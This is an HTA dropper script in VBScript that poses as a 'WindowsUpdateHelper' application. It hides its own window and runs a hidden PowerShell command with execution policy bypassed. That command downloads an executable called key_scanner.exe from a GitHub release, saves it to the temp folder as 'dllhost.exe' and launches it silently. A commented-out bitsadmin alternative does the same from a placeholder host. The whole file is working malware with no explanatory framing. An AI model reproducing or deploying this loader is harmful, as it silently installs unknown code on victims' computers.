<hta:application
  id="oHTA"
  applicationname="WindowsUpdateHelper"
  border="none"
  caption="no"
  showintaskbar="no"
  windowstate="minimize"
  singleinstance="yes"
  navigable="no"
  sysmenu="no"
  contextmenu="no"
  innerborder="no"
  scroll="no"
/>

<script language="VBScript">
  ' ==== ENSURE WINDOW NEVER APPEARS ====
  Window.resizeTo 0,0
  Window.moveTo -2000,-2000
  Set WshShell = CreateObject("WScript.Shell")
  
  ' ==== METHOD 1: MOST RELIABLE (POWERSHELL) ====
  psCommand = "powershell -NoP -NonI -W Hidden -Exec Bypass ""$p='%temp%\dllhost.exe';" & _
              "(New-Object Net.WebClient).DownloadFile('https://github.com/jozef800/discord/releases/download/v3.0/key_scanner.exe',$p);" & _
              "Start-Process -WindowStyle Hidden $p"""
  
  ' ==== METHOD 2: ALTERNATIVE (BITSADMIN) ====
  ' psCommand = "cmd /q /c bitsadmin /transfer job /download /priority high " & _
  '             "https://example.com/payload.exe %temp%\dllhost.exe & start /b %temp%\dllhost.exe"
  
  ' ==== EXECUTE COMPLETELY SILENTLY ====
  WshShell.Run "mshta vbscript:Execute(""CreateObject('WScript.Shell').Run """ & psCommand & """,0:close"")", 0, False
  
  ' ==== FORCE CLOSE HTA ====
  window.setTimeout "Self.Close()", 500
</script>
